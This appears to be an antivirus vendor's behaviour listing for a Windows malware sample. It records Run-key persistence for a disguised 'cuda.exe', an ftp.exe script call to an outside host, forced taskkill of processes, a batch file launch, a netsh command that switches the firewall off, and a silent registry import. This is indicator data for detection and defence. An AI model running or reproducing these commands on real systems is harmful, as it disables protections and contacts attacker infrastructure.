Technical Information
- [<HKLM>\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run] 'cuda' = '%WINDIR%\system\config\cuda.exe --auto-start'
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'cuda' = '%WINDIR%\system\config\cuda.exe'
- User Account Control (UAC)
- '%WINDIR%\system\config\cuda.exe'
- '<SYSTEM32>\ftp.exe' -s:%WINDIR%\system\config\ftp.txt worldvision.serveftp.com
- '<SYSTEM32>\taskkill.exe' -t -f /im proxy.exe
- '<SYSTEM32>\taskkill.exe' -t -f /im system.exe
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\br.bat" "
- '<SYSTEM32>\netsh.exe' advfirewall set allprofiles state off
- '%WINDIR%\regedit.exe' /i/s %WINDIR%\system\config\cuda.reg
- %WINDIR%\system\config\cuda.reg
- %TEMP%\1.tmp\br.bat
- %WINDIR%\system\config\cuda.exe
- %WINDIR%\system\config\ftp.txt
- %WINDIR%\system\config\opencl.ico
- 'localhost':1038
- 'wo######ion.serveftp.com':21
- DNS ASK wo######ion.serveftp.com
- ClassName: 'RegEdit_RegEdit' WindowName: ''
- ClassName: '' WindowName: ''
- ClassName: 'EDIT' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''